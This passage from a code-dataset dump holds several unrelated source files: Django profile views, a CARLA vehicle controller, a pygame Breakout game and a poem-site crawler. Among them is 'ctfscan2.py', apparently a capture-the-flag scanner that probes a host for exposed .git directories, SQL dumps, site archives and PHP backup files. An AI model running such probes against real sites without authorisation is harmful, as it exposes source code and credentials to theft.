CAM2dbApi.objects.filter(user=request.user).values()\n emailForm = ProfileEmailForm(instance=user)\n try:\n optional = RegisterUser.objects.get(user=user)\n except:# If cannot find RegisterUser object(social login users), create one\n add_form = AdditionalForm({})\n optional = add_form.save(commit=False)\n optional.user = user\n optional.save()\n infoForm = AdditionalForm(instance=optional)#get form with info of a specific instance\n\n\n '''\n # Enter name for social login users\n if request.method == 'POST' and 'saveName' in request.POST:\n nameForm = NameForm(request.POST, instance=user)\n if nameForm.is_valid():\n nameForm.save()\n messages.success(request, 'Thank you! Your name has been updated.')\n else:\n nameForm = NameForm(instance=user)\n messages.error(request, 'Something went wrong. Please try again or contact us!')\n #return redirect('profile')\n return render(request, 'app/profile.html', form_dict)\n '''\n # Add app\n if request.method == 'POST' and 'add' in request.POST:\n app_form = AppForm(request.POST)\n if app_form.is_valid():\n dbapp = app_form.save(commit=False)\n dbapp.user = request.user\n dbapp.save()\n return redirect('profile')\n else:\n app_form = AppForm()\n #messages.error(request, 'Something went wrong. Please try again or contact us!')\n #return render(request, 'app/profile.html', form_dict)\n\n # Change Email\n if request.method == 'POST' and 'changeEmail' in request.POST:\n emailForm = ProfileEmailForm(request.POST, instance=user)\n if emailForm.is_valid():\n emailForm.save()\n messages.success(request, 'Your Email has been successfully updated!')\n return redirect('profile')\n else:\n emailForm=ProfileEmailForm(instance=user)\n #messages.error(request, 'Something went wrong. Please try again or contact us!')\n #return render(request, 'app/profile.html', form_dict)\n\n # Modify Profile\n if request.method == 'POST' and 'changeInfo' in request.POST:\n infoForm = AdditionalForm(request.POST, instance=optional)\n if infoForm.is_valid():\n infoForm.save()\n messages.success(request, 'Your information has been successfully updated!')\n return redirect('profile')\n else:\n infoForm=AdditionalForm(instance=optional)\n #messages.error(request, 'Something went wrong. Please try again or contact us!')\n return render(request, 'app/profile.html', {\n 'github_login': github_login,\n 'app_form': app_form,\n 'apps': apps,\n 'infoForm': infoForm,\n 'emailForm': emailForm,\n })\n\n\"\"\" use 'password_reset' instead\ndef change_password(request):\n user = request.user\n passwordform = PasswordChangeForm(user)\n if request.method == 'POST':\n passwordform = PasswordChangeForm(user, request.POST)\n if passwordform.is_valid():\n passwordform.save()\n update_session_auth_hash(request, passwordform.user)\n messages.success(request, 'Your password has been successfully updated!')\n return redirect('profile')\n else:\n passwordform = PasswordChangeForm(user)\n\n return render(request, 'app/change_password.html', {'passwordform': passwordform})\n\"\"\"\n\ndef oauthinfo(request):\n \"\"\"Renders a form for additional content for users authenticated with Github or Google\n\n Retrieves information from the social authentication library provided by Django and allows\n a user authenticated with an external service to provide additional information about themselves\n (organization, location, etc...) 
that can then be stored within the Django admin user database.\n\n    * Note that while this appears to be the intention, it isn't fully implemented yet *\n\n    Args:\n        request: the HttpRequest corresponding to the page to be accessed.\n\n    Returns:\n        A render that displays the page for externally authenticated users to add information about themselves.\n    \"\"\"\n    if request.method == 'POST':\n        return redirect('index')\n\n    else:\n        user = request.user\n        if user.is_active:\n            return redirect('index')\n        else:\n            try:\n                github_login = user.social_auth.get(provider='github')\n            except UserSocialAuth.DoesNotExist:\n                github_login = None\n\n            form2 = AdditionalForm()\n\n    return render(request, 'app/oauthinfo.html', {'form2': form2})\n\n\ndef error500(request):\n    return render(request, 'app/500.html')\n\ndef error404(request, exception, template_name='app/404.html'):\n    return render(request, 'app/404.html')\n\ndef api_request(request):\n    template_name = 'app/api_access.html'\n    return render(request, template_name)\n\ndef videos(request):\n    video = Video.objects.all()\n    context = {'videos_list': video}\n    return render(request, 'app/videos.html', context)\n\ndef publications_list(request):\n    publication_list = Publication.objects.reverse()\n    context = {'publication_list': publication_list}\n    return render(request, 'app/publications_list.html', context)\n\n    \n\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":24688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} 
404:\n print(f'\\033[1;32;40m[+] {response.status} {url}\\033[0m')\n else:\n print(f'[-] 404 {url}')\n\n\ndef scan(host, filenames):\n filename_extension_dic = \"\"\"\n .php.swp\n .php~\n .php.bak\n .php.old\n .php.swo\n .php.svn\n .php.zip\n .php.rar\n .php.txt\n ~\n ~1~\n ~2~\n ~3~\n .save\n .save1\n .save2\n .save3\n .bak_Edietplus\n .bak\n .back\n .war\n \"\"\"\n filename_extension_list = filename_extension_dic.strip().split()\n all_url = []\n for filename in filenames:\n for extension in filename_extension_list:\n all_url.append(f'{host}{filename}{extension}')\n all_url.append(f'{host}.{filename}{extension}')\n\n backup_and_version_dic = \"\"\"\n .git/\n .svn/\n .hg/\n 1.zip\n 1.rar\n tar.zip\n tar.rar\n web.zip\n web.rar\n web.tgz\n web1.zip\n web1.rar\n 123.zip\n 123.rar\n code.zip\n code.rar\n www.zip\n www.rar\n root.zip\n root.rar\n wwwroot.zip\n wwwroot.rar\n backup.zip\n backup.rar\n mysql.bak\n a.sql\n b.sql\n db.sql\n bdb.sql\n ddb.sql\n mysql.sql\n dump.sql\n data.sql\n backup.sql\n backup.sql.gz\n backup.sql.bz2\n backup.zip\n rss.xml\n crossdomain.xml\n phpinfo.php\n test.php\n \"\"\"\n backup_and_version_list = backup_and_version_dic.strip().split()\n for b in backup_and_version_list:\n all_url.append(f'{host}{b}')\n\n loop = asyncio.get_event_loop()\n tasks = [requests_get(u) for u in all_url]\n loop.run_until_complete(asyncio.wait(tasks))\n loop.close()\n\n print('[*] Scan Finished.')\n\n pass\n\n\nif __name__ == '__main__': # 使用示例 $ python3 ctfscan2.py ctf.com index login register\n host = sys.argv[1]\n filename = sys.argv[2:]\n\n # host = 'localhost'\n # filename = ['index','login','register']\n\n if 'http' not in host:\n host = 'http://' + host\n\n if host[-1] != '/':\n host = host + '/'\n\n scan(host, filename)\n","sub_path":"ctfscan2.py","file_name":"ctfscan2.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"651868242","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 8 11:06:32 2020\n\n@author: shijiliu\n\"\"\"\n\n\nimport carla\nimport numpy as np\nfrom collections import deque\nimport time\nimport math\n\nimport control # the python-control package, install first\n\nfrom generate_path_omit_regulation import generate_path\nfrom intersection_definition import Intersection, get_traffic_lights, get_trajectory, smooth_trajectory\nfrom carla_env import CARLA_ENV # self-written class that provides help functions, should be in the same folder\nfrom configobj import ConfigObj\nfrom multiple_vehicle_control import VehicleControl\n\nimport copy\n\n# color for debug use\nred = carla.Color(255, 0, 0)\ngreen = carla.Color(0, 255, 0)\nblue = carla.Color(47, 210, 231)\ncyan = carla.Color(0, 255, 255)\nyellow = carla.Color(255, 255, 0)\norange = carla.Color(255, 162, 0)\nwhite = carla.Color(255, 255, 255)\n\nclass LeadVehicleControl(VehicleControl):\n # the LeadVehicleControl has two different modes:\n # normal full path mode: vehicle follows normal full path\n # pause mode: vehicle stop to the right of the lane,\n # waiting for the ego vehicle to come\n \n def __init__(self,env,vehicle_config, delta_seconds):\n super().__init__(env, vehicle_config, delta_seconds)\n \n # copy the full path trajectory\n self.full_path_trajectory = copy.copy(self.trajectory)\n self.full_path_index = copy.copy(self.index)\n self.full_path_ref_speed_list = copy.copy(self.ref_speed_list )\n \n # generate waypoints for pausing the car\n self._get_pause_waypoints()\n 
self.mode = \"normal\"\n \n def _get_pause_waypoints(self):\n '''\n generate a list of waypoints for the pause path\n the waypoints are in vehicle right-hand coordinates, the heading \n direction of the vehicle is x-axis\n\n Returns\n -------\n None.\n\n '''\n bb = self.vehicle_config[\"bounding_box\"]\n self.pause_waypoint_list = [(0.0,0.0),(bb.x, -bb.y ),(bb.x * 2,-bb.y * 2),(bb.x * 3, -bb.y * 3),(bb.x * 4, -bb.y * 3.5),(bb.x * 5, -bb.y * 3.5),(bb.x * 6, -bb.y * 3.5),(bb.x * 7, -bb.y * 3.5)]\n #[(0.0,0.0),(2 * bb.x, 0.0),(bb.x * 3,bb.y / 2),(bb.x * 4, bb.y),(bb.x * 5, bb.y * 2),(bb.x * 6, bb.y * 2),(bb.x * 8, bb.y * 2)]\n #[(0.0,0.0),(bb.x, 0.0),(bb.x * 2,-bb.y / 2),(bb.x * 3, -bb.y),(bb.x * 4, -bb.y)]\n \n def _get_unit_left_vector(self,yaw):\n # get the left vector (y axis)\n right_yaw = (yaw + 90) % 360\n rad_yaw = math.radians(right_yaw)\n left_vector = np.array([math.cos(rad_yaw),math.sin(rad_yaw)])\n left_vector = left_vector / np.linalg.norm(left_vector)\n return left_vector\n \n def _generate_pause_path(self):\n '''\n generate a path for the vehicle to right shift a certain value and then stop.\n assume the lead vehicle is always heading in the straight direction\n\n Returns\n --\n None\n '''\n # get world transform of the lead vehicle\n world_transform = self.env.get_transform_3d(self.model_uniquename)\n location = world_transform.location\n location_2d = np.array([location.x,location.y])\n forward_vector = world_transform.get_forward_vector()\n forward_vector_2d = np.array([forward_vector.x,forward_vector.y])\n left_vector_2d = self._get_unit_left_vector(world_transform.rotation.yaw)\n \n # transform local waypoints into global coordinates\n world_waypoints = []\n for pt in self.pause_waypoint_list:\n world_pt = location_2d + pt[0] * forward_vector_2d + pt[1] * left_vector_2d\n world_waypoints.append( ((world_pt[0],world_pt[1]),5.0) ) # vehicle will stop at 5 m/s\n if self.debug_vehicle:\n loc = carla.Location(x = world_pt[0],y = world_pt[1], z = 0.0)\n self.env.world.debug.draw_point(loc, size = 0.2, color = white, life_time=0.0, persistent_lines=True)\n \n # form trajectory\n smoothed_full_trajectory, ref_speed_list = get_trajectory(world_waypoints)\n \n self.pause_path_trajectory = smoothed_full_trajectory\n self.pause_path_ref_speed = ref_speed_list\n \n self.pause_path_index = 0\n \n if self.debug_vehicle:\n \n for ii in range(1,len(smoothed_full_trajectory)):\n loc1 = carla.Location(x = smoothed_full_trajectory[ii - 1][0], y = smoothed_full_trajectory[ii - 1][1], z = 0.0)\n loc2 = carla.Location(x = smoothed_full_trajectory[ii][0], y = smoothed_full_trajectory[ii][1], z = 0.0)\n self.env.world.debug.draw_arrow(loc1, loc2, thickness = 0.05, arrow_size = 0.1, color = red, life_time=0.0, persistent_lines=True)\n \n def change_mode(self, mode):\n '''\n change vehicle mode\n \n the LeadVehicleControl has two different modes:\n normal full path mode: vehicle follows normal full path\n pause mode: vehicle stop to the right of the lane,\n waiting for the ego vehicle to come\n\n Parameters\n ----------\n mode : string\n the mode. 
valid valuse are \"normal\",\"pause\"\n\n Returns\n -------\n None.\n\n '''\n if mode == \"normal\":\n self.index = copy.copy(self.full_path_index)\n self.ref_speed_list = copy.copy(self.full_path_ref_speed_list)\n self.trajectory = copy.copy(self.full_path_trajectory)\n self.mode = mode\n elif mode == \"pause\":\n self._generate_pause_path() # generate path when switching mode\n self.index = copy.copy(self.pause_path_index)\n self.ref_speed_list = copy.copy(self.pause_path_ref_speed)\n self.trajectory = copy.copy(self.pause_path_trajectory)\n self.mode = mode\n\n\n def pure_pursuit_control_wrapper(self):\n '''\n Apply one step control to the vehicle, store essential information for further use\n \n Note: this is an overriden version of pure_pursuit_control_wrapper\n to avoid vehicle being removed from the environment when reach the end of pause\n\n Returns\n -------\n end_trajectory : bool\n whether this vehicle reaches its end\n\n '''\n \n curr_speed = self.env.get_forward_speed(self.model_uniquename)\n vehicle_pos_2d = self.env.get_transform_2d(self.model_uniquename) # the (x,y) location and yaw angle of the vehicle\n self.speed.append(curr_speed)\n self.curr_speeds.append(curr_speed)\n \n # draw real trajectory if debug is enabled\n if self.debug_vehicle:\n self.vehicle_pose.append(vehicle_pos_2d[0])\n if len(self.vehicle_pose) == 2:\n self.env.draw_real_trajectory(self.vehicle_pose)\n \n # use pure-pursuit model to get the steer angle (in radius)\n delta, current_ref_speed, index, end_trajectory = self.pure_pursuit_control(vehicle_pos_2d, curr_speed, self.trajectory, self.ref_speed_list, self.index)\n self.index = index\n steer = np.clip(delta,-1.0,1.0)\n \n \n # If vehicle has safety distance set, check whether a vehicle is in the front\n current_ref_speed = self._obey_safety_distance(current_ref_speed)\n \n # If vehicle obey traffic lights and is going straight / turning left, check the traffic light state\n current_ref_speed = self._obey_traffic_light(current_ref_speed)\n \n #if self.debug_vehicle:\n # print(\"current_ref_speed == \",current_ref_speed)\n \n self.ref_speeds.append(current_ref_speed)\n self.reference_speed.append(current_ref_speed)\n \n # get throttle to get the next reference speed \n throttle = self.speed_control() # get the throttle control based on reference and current speed\n throttle = np.clip(throttle,0,1) # throttle value is [0,1]\n self.throttles.append(throttle) # for visualization\n \n # check whether we are reaching the destination or not\n # this part is different from the original version\n if end_trajectory and self.mode == \"normal\":\n vehicle_control = carla.VehicleControl(throttle = 0.0,steer=steer,brake = 1.0) # immediately stop the car\n self.env.apply_vehicle_control(self.model_uniquename, vehicle_control) # apply control to vehicle\n self.run = False\n self._destroy_vehicle()\n return end_trajectory\n elif end_trajectory and self.mode == \"pause\":\n vehicle_control = carla.VehicleControl(throttle = 0.0,steer=steer,brake = 1.0)\n self.env.apply_vehicle_control(self.model_uniquename, vehicle_control)\n return False\n \n \n \n # apply throttle-steer-brake control\n if curr_speed <= current_ref_speed:\n vehicle_control = carla.VehicleControl(throttle = throttle,steer=steer) \n else:\n vehicle_control = carla.VehicleControl(throttle = throttle,steer=steer,brake = 0.5)\n self.env.apply_vehicle_control(self.model_uniquename, vehicle_control) # apply control to vehicle\n return end_trajectory 
","sub_path":"backend/full_path_vehicle.py","file_name":"full_path_vehicle.py","file_ext":"py","file_size_in_byte":9357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"562775218","text":"\"\"\"\nAtari Breakout (with pygame) v1.0 by smartspot2\n\nNOTES:\nStarted- 6/10/16 9:36 PM\nCompleted- N/A\nLast edited- N/A\n\n\n\n\"\"\"\n\nimport pygame\nimport os\nimport random\nimport math\n\nfrom write import write\n\npyg = pygame\ndisp = pyg.display\n\n\"\"\"Set screen resolution\"\"\"\nscreen = pyg.display.set_mode((625, 480))\nscreen_rect = screen.get_rect()\ndisp.set_caption('Pong')\n\n\"\"\"Initialize variables\"\"\"\nWHITE = pyg.Color('white')\nBLACK = pyg.Color('black')\nGRAY = pyg.Color('gray')\nDARK_GRAY = pyg.Color('gray2')\nRED = pyg.Color('red')\nGREEN = pyg.Color('green')\nBLUE = pyg.Color('blue')\nYELLOW = pyg.Color('yellow')\nORANGE = pyg.Color('orange')\n\nbg_col = WHITE\nscore_col = BLACK\n\nscreen_w = screen.get_width()\nscreen_h = screen.get_height()\n\n\"\"\"Settings\"\"\"\n\nbrick_count = 71\n\nstart = 1\n\nfps = 80\n\nmove_dist = 7\nmove_dist_comp = 7\n\ndefault_ball_count = 1\n\nball_count = int(default_ball_count)\n\nball_min_speed = 6 # Default 9\nball_max_speed = 8 # Default 11\n\n\"\"\"Initialize pygame and display\"\"\"\npyg.init()\ndisp.init()\n\n\"\"\"Fill and update display\"\"\"\nscreen.fill(bg_col)\ndisp.flip()\n\n\"\"\"Convenience functions\"\"\"\ndef update():\n \"\"\"Updates screen\"\"\"\n disp.flip()\n\n\ndef clear():\n \"\"\"Clears screen\"\"\"\n screen.fill(bg_col)\n\ndef load_img(name):\n \"\"\"Loads image\"\"\"\n image_name = os.path.join('img', name)\n image = pyg.image.load(image_name)\n image_rect = image.get_rect()\n return image, image_rect\n\nclass Ball(pyg.sprite.Sprite):\n \"\"\"The ball.\"\"\"\n def __init__(self, speed):\n \"\"\"Initialize variables\"\"\"\n pyg.sprite.Sprite.__init__(self) # Initialize Sprite\n\n # Load image and image rect\n self.image, self.rect = load_img('ball.bmp')\n\n self.rect.move_ip(\n (screen_w - self.rect.x)//2,\n (screen_h - self.rect.y)//2) # Move in place\n\n self.vel = pyg.math.Vector2(\n random.uniform(0, math.pi*2), speed) # Create velocity vector\n self.speed = speed # Set speed\n self.bounce = 0 # Number of bounces; speed varies as this varies\n self.direction = 'None' # Direction of ball\n\n update() # Update screen\n\n def update(self):\n \"\"\"Updates the ball's position\"\"\"\n global b_list\n if start == 0:\n newpos = self.new_pos() # Calculates new position\n self.rect = newpos # Sets the ball's rect to the new position\n selfcollide = self.rect.colliderect\n selfcollidelist = self.rect.collidelist\n\n on_screen = screen_rect.contains(self.rect) # If the ball is onscreen\n if on_screen: # If the ball is onscreen and collides with a paddle\n if selfcollide(p1.rect):\n self.check_paddle() # Check/change ball's angle for paddles\n if selfcollidelist(brick_list) > -1:\n self.check_bricks()\n elif not on_screen: # If the ball is not onscreen\n self.check_walls() # Check/change ball's angle for walls\n\n if self.bounce % 50 == 0: #If number of bounces is divisible by 50\n self.speed += 1 #Add 1 to speed\n\n angle = math.degrees(self.vel[0]) # Change/get angle in degrees\n # If the ball is going right, set the direction to 'right'\n if 0 < abs(angle) < 90 or 270 < abs(angle) < 360:\n self.direction = 'right'\n # If the ball is going left, set the direction to 'left'\n elif 90 < abs(angle) < 270:\n self.direction = 'left'\n # Otherwise, there is a problem\n 
else:\n self.direction = 'none'\n elif start == 1:\n if b_list:\n b_list = [b_list[0]]\n self.rect.x, self.rect.y = p1.rect.midtop\n self.rect.x -= self.rect.w//2\n self.rect.y -= self.rect.h\n\n def check_paddle(self):\n \"\"\"\n Checks and changes the ball's angle\n when bouncing off the paddle\n \"\"\"\n \n (angle, z) = self.vel\n noise = random.uniform(-0.1, 0.1)\n\n if self.rect.colliderect(p1.rect) == 1:\n fromcenter = self.rect.midbottom[0] - p1.rect.midbottom[0]\n angle = -math.pi/2 + noise + fromcenter * (math.pi/150)\n\n self.bounce += 1\n\n self.vel = pyg.math.Vector2(angle, z)\n\n def check_walls(self):\n global start\n \"\"\"\n Checks and changes the ball's angle\n when bouncing off of walls\n \"\"\"\n \n (angle, z) = self.vel\n (dx, dy) = (z*math.cos(angle), z*math.sin(angle))\n\n if self.rect.bottom + dy > screen_h:\n start = 1\n elif self.rect.top + dy < 0:\n angle *= -1\n elif self.rect.left + dx < 0 or self.rect.right + dx > screen_w:\n angle = math.pi - angle\n\n self.bounce += 1\n\n self.vel = pyg.math.Vector2(angle, z)\n\n def check_bricks(self):\n (angle, z) = self.vel\n\n index = self.rect.collidelist(brick_list)\n if index > -1:\n brick = brick_list[index]\n selfcenter = self.rect.center\n if selfcenter[0] > brick.rect.right or \\\n selfcenter[0] < brick.rect.left:\n angle = math.pi-angle\n else:\n angle *= -1\n\n del brick_list[index]\n self.vel = pyg.math.Vector2(angle, z)\n \n\n def new_pos(self):\n \"\"\"\n Calculates the ball's new position\n \"\"\"\n (angle, z) = self.vel\n (dx, dy) = (z*math.cos(angle), z*math.sin(angle))\n while round(dx, 0) in (-1, 0, 1):\n dx += 1\n while round(dy, 0) in (-1, 0, 1):\n dy += 1\n return self.rect.move(dx, dy)\n\n def sendranddirection(self):\n (angle, z) = self.vel\n angle = random.uniform(-math.pi, math.pi)\n self.vel = pyg.math.Vector2(angle, z)\n\n\nclass Paddle(pyg.sprite.Sprite):\n def __init__(self, side):\n \"\"\"\n side: 1 = bottom\n side: 2 = top\n \"\"\"\n pyg.sprite.Sprite.__init__(self)\n self.image, self.rect = load_img('paddle.bmp')\n self.side = side\n self.determine_sides()\n\n def determine_sides(self):\n if self.side == 1:\n self.rect.move_ip(\n (screen_w - self.rect.w)//2,\n 7*(screen_h)//8 - (self.rect.h)//2)\n elif self.side == 2:\n self.rect.move_ip(\n (screen_w - self.rect.w)//2,\n (screen_h)//8 - (self.rect.h)//2)\n\n def update(self):\n keys = pyg.key.get_pressed()\n\n if keys[pyg.K_RIGHT]:\n if self.rect.right >= screen_w:\n return\n self.rect.move_ip(move_dist, 0)\n if keys[pyg.K_LEFT]:\n if self.rect.left <= 0:\n return\n self.rect.move_ip(-move_dist, 0)\n\n def comp_right(self):\n if self.rect.right + move_dist_comp >= screen_w:\n return\n self.rect.move_ip(move_dist_comp, 0)\n\n def comp_left(self):\n if self.rect.left - move_dist_comp <= 0:\n return\n self.rect.move_ip(-move_dist_comp, 0)\n\n def comp_update(self):\n dist_list = []\n for b in b_list:\n dist_x = self.rect.x - b.rect.x\n dist_y = self.rect.y - b.rect.y\n dist_list.append(math.sqrt(abs(dist_x)**2 + abs(dist_y)**2))\n\n b = b_list[dist_list.index(min(dist_list))]\n dist = self.rect.x - b.rect.x\n move = False\n\n if self.side == 1:\n if b.rect.y >= 3*screen_h//8:\n move = True\n elif self.side == 2:\n if b.rect.y <= 5*screen_h//8:\n move = True\n\n if not gamemode_reverse:\n if move or len(b_list) > 1:\n if dist < -5:\n self.comp_right()\n elif dist > 5:\n self.comp_left()\n elif not move or len(b_list) > 1:\n if dist < -200:\n self.comp_right()\n if dist > 200:\n self.comp_left()\n elif gamemode_reverse:\n if move or len(b_list) > 
1:\n if (b.direction == 'right' and dist < 300):\n self.comp_left()\n elif (b.direction == 'left' and dist > -300):\n self.comp_right()\n elif b.direction == 'right' and dist < 350:\n self.comp_right()\n elif b.direction == 'left' and dist > -350:\n self.comp_left()\n elif not move or len(b_list) > 1:\n if dist < -200:\n self.comp_left()\n if dist > 200:\n self.comp_right()\n\nclass Brick(pyg.sprite.Sprite):\n def __init__(self, x, y):\n pyg.sprite.Sprite.__init__(self)\n self.image, self.rect = load_img('brick.bmp')\n self.x = x\n self.y = y\n self.w = self.rect.w\n self.h = self.rect.h\n self.rect.move_ip(x, y)\n\ndef main():\n global p1, start\n global b_list, b_sprite_list, brick_list, brick_sprite_list\n global score\n global fps, ball_count\n global p1_is_comp\n \n score = [0, 0, 0]\n\n ball_count = int(default_ball_count)\n\n p1 = Paddle(1)\n\n b_list = []\n for i in range(ball_count):\n b_list.append(Ball(random.uniform(ball_min_speed, ball_max_speed)))\n\n p1_sprite = pyg.sprite.RenderClear(p1)\n\n b_sprite_list = []\n for ball in b_list:\n b_sprite_list.append(pyg.sprite.RenderClear(ball))\n\n brick_list = []\n b_x = 0\n b_y = 0\n for i in range(brick_count):\n brick = Brick(b_x, b_y)\n brick_list.append(brick)\n if b_x > screen_w:\n b_x = b_x - screen_w - 2*brick.w\n b_y += brick.h\n b_x += brick.w\n screen.blit(brick.image, (brick.rect.x, brick.rect.y))\n update()\n print(b_x, b_y, brick)\n \n\n brick_sprite_list = []\n for brick in brick_list:\n brick_sprite_list.append(pyg.sprite.RenderClear(brick))\n \n\n clock = pyg.time.Clock()\n\n while True:\n clock.tick(fps)\n\n keys_pressed = pyg.key.get_pressed()\n\n if keys_pressed[pyg.K_LSHIFT] or keys_pressed[pyg.K_RSHIFT]:\n for event in pyg.event.get():\n if event.type == pyg.KEYDOWN:\n if event.key == pyg.K_MINUS:\n rand = random.randint(0, len(b_list)-1)\n if len(b_list) > 1:\n b_list.remove(b_list[rand])\n b_sprite_list.remove(b_sprite_list[rand])\n ball_count -= 1\n print('Removed ball')\n elif event.key == pyg.K_EQUALS:\n b_list.append(Ball(random.uniform(ball_min_speed, ball_max_speed)))\n b_sprite_list.append(pyg.sprite.RenderClear(b_list[-1]))\n ball_count += 1\n print('Added ball')\n\n if keys_pressed[pyg.K_LEFTBRACKET]:\n if fps > 1:\n fps -= 1\n print('Reduced fps')\n elif keys_pressed[pyg.K_RIGHTBRACKET]:\n fps += 1\n print('Increased fps')\n\n if keys_pressed[pyg.K_SPACE] and start == 1:\n b_list[0].sendranddirection()\n start = 0\n\n if keys_pressed[pyg.K_LEFTBRACKET] and not (keys_pressed[pyg.K_LSHIFT] or keys_pressed[pyg.K_RSHIFT]):\n if fps > 1:\n fps -= 1\n print('Reduced fps')\n elif keys_pressed[pyg.K_RIGHTBRACKET] and not (keys_pressed[pyg.K_LSHIFT] or keys_pressed[pyg.K_RSHIFT]):\n fps += 1\n print('Increased fps')\n\n if keys_pressed[pyg.K_MINUS] and not (keys_pressed[pyg.K_LSHIFT] or keys_pressed[pyg.K_RSHIFT]):\n rand = random.randint(0, len(b_list)-1)\n if len(b_list) > 1:\n b_list.remove(b_list[rand])\n b_sprite_list.remove(b_sprite_list[rand])\n ball_count -= 1\n print('Removed ball')\n else:\n print('Cannot remove ball; only one left')\n elif keys_pressed[pyg.K_EQUALS] and not (keys_pressed[pyg.K_LSHIFT] or keys_pressed[pyg.K_RSHIFT]):\n b_list.append(Ball(random.uniform(ball_min_speed, ball_max_speed)))\n b_sprite_list.append(pyg.sprite.RenderClear(b_list[-1]))\n ball_count += 1\n print('Added ball')\n\n ball_count = len(b_list)\n\n p1.update()\n \n for ball in b_list:\n ball.update()\n\n clear()\n screen.blit(p1.image, (p1.rect.x, p1.rect.y))\n\n for ball in b_list:\n screen.blit(ball.image, 
(ball.rect.x, ball.rect.y))\n\n for brick in brick_list:\n screen.blit(brick.image, (brick.x, brick.y))\n\n write(screen, 'FPS: ' + str(fps), score_col, None, 20, screen_w-75, screen_h-50)\n write(screen, 'Balls: ' + str(ball_count), score_col, None, 20, screen_w-75, screen_h-25)\n\n update()\n\nif __name__ == '__main__':\n main()\n pygame.quit()\n","sub_path":"Atari Breakout.py","file_name":"Atari Breakout.py","file_ext":"py","file_size_in_byte":13198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"651133081","text":"import requests\nfrom bs4 import BeautifulSoup\nimport json\nimport os\nimport re\nfrom Model.utils.WebProxyTools import WebProxyTool\n\nclass poemSpider:\n def __init__(self,base_url,dir_to_save,base_dir_for_save = None, website_to_crawl = None):\n self.website_to_crawl = website_to_crawl\n self.base_url = base_url\n self.dir_to_save = dir_to_save\n self.base_dir_for_save = base_dir_for_save\n self.num_poems = 0\n self.poems = []\n self.url_crawled = []\n\n def getPage(self,href):\n req = requests.get(url=href)\n if req.status_code == 404:\n return None\n # req.encoding = \"gb18030\" # in case of Chinese character\n req.encoding = \"gb18030\"\n html = req.text\n bf = BeautifulSoup(html, 'html.parser')\n return bf\n\n def getOnePoem(self,href):\n html = self.getPage(href)\n texts = html.find(id=\"content\")\n texts = texts.find(id=\"main\")\n texts = texts.find_all('p')\n\n content = []\n for p in texts:\n content.append(p.get_text())\n content = content[2:]\n\n return content\n\n def getPoemList(self,target):\n bf = self.getPage(target)\n if bf is None:\n return None\n texts = bf.find_all('div', class_=\"list_content\")[0]\n texts = texts.find_all('a')\n hrefs_to_crawl = []\n for a in texts:\n print(a.get_text())\n hrefs_to_crawl.append(a.get('href'))\n return hrefs_to_crawl\n\n def save(self,dir_to_save=None):\n if self.dir_to_save is None and dir_to_save is None:\n raise print(f'[log] no dir to save {self.website_to_crawl}')\n if dir_to_save is not None:\n with open(dir_to_save,'w',encoding=\"utf8\") as fout:\n json.dump(self.poems,fout,ensure_ascii=False)\n if self.dir_to_save is not None and self.dir_to_save != dir_to_save:\n with open(self.dir_to_save,\"w\",encoding=\"utf8\") as fout:\n json.dump(self.poems,fout,ensure_ascii=False)\n\nclass poemSanwenji(poemSpider):\n def __init__(self , base_url, dir_to_save=os.path.join(r'E:\\\\PycharmProjects\\\\FirstDayOnMS2\\\\Data\\\\Poem','sanwenji/sanwenji.json'),base_dir_for_save = r'E:\\\\PycharmProjects\\\\FirstDayOnMS2\\\\Data\\\\Poem',kind_url=None,base_name=None, website_to_crawl ='散文集网' ):\n super(poemSanwenji,self).__init__(base_url, dir_to_save, base_dir_for_save ,website_to_crawl = website_to_crawl)\n\n def getPage(self,href):\n req = requests.get(url=href)\n if req.status_code == 404:\n return None\n # req.encoding = \"gb18030\" # in case of Chinese character\n req.encoding = \"gb18030\"\n html = req.text\n bf = BeautifulSoup(html, 'html.parser')\n return bf\n\n def getOnePoem(self,href):\n html = self.getPage(href)\n texts = html.select('div[class=\"article_content\"]')[\n 0] # 用select不要用find_all() ,后者返回的是一个NavigableString类型,而不是tag不能进行继续的检索\n texts = texts.select('p')\n content = []\n for p in texts:\n content.append(p.get_text())\n # content = content[2:]\n poem_title = []\n texts_article_title = html.select('div[class=\"article_tit\"]')[0]\n texts_article_title = texts_article_title.select('a')[0].get_text()\n poem_title.append(texts_article_title)\n poem = 
poem_title + ['。'] + content\n return poem_title , content\n\n def getPoemList(self,target):\n bf = self.getPage(target)\n if bf is None:\n return None\n texts = bf.find_all('div', class_=\"list_content\")[0]\n texts = texts.find_all('a')\n hrefs_to_crawl = []\n for a in texts:\n print(a.get_text())\n hrefs_to_crawl.append(a.get('href'))\n return hrefs_to_crawl\n\n def getOneKindPoem(self,base_url, save_dir_base,cur_poem_class):\n pre = base_url\n # pre = \"http://www.sanwenji.cn/sanwen/sanwen/shanggan/list_\"\n post = \".html\"\n for number in range(1, 20):\n print(\"number = \", number)\n url = pre + str(number) + post\n hrefs_to_crawl = self.getPoemList(url)\n if hrefs_to_crawl is None:\n break\n for i, ele in enumerate(hrefs_to_crawl):\n print(\"number = \", number, \" i= \", i)\n if ele in self.url_crawled:\n continue\n self.url_crawled.append(ele)\n poem_title, poem_content = self.getOnePoem(ele)\n onePoem = poem_title + ['。'] + poem_content\n if len(onePoem) == 0:\n print(\"ele = \", ele)\n continue\n self.num_poems +=1\n temp_dict = {\"poem_id\":self.num_poems,\n 'poem_title':'\\n'.join(poem_title),\n 'origin_poem':\"\\n\".join(poem_content),\n 'poem_class':cur_poem_class,\n 'url':ele,\n 'website_name':self.website_to_crawl\n }\n self.poems.append(temp_dict)\n\n '''\n 下面是将这篇散文保存到一个文件的逻辑\n '''\n if self.base_dir_for_save:\n save_dir_base = os.path.join(self.base_dir_for_save,save_dir_base)\n if not os.path.exists(save_dir_base):\n os.makedirs(save_dir_base)\n print(\"save_dir_base\",save_dir_base)\n filename = save_dir_base + str(number) + \"__\" + str(i)\n print(\"filename = \", filename)\n with open(filename + \".txt\", \"w\", encoding=\"utf8\") as fout:\n fout.write(\"\\n\".join(onePoem))\n # with open(filename + '.pkl', \"wb\") as 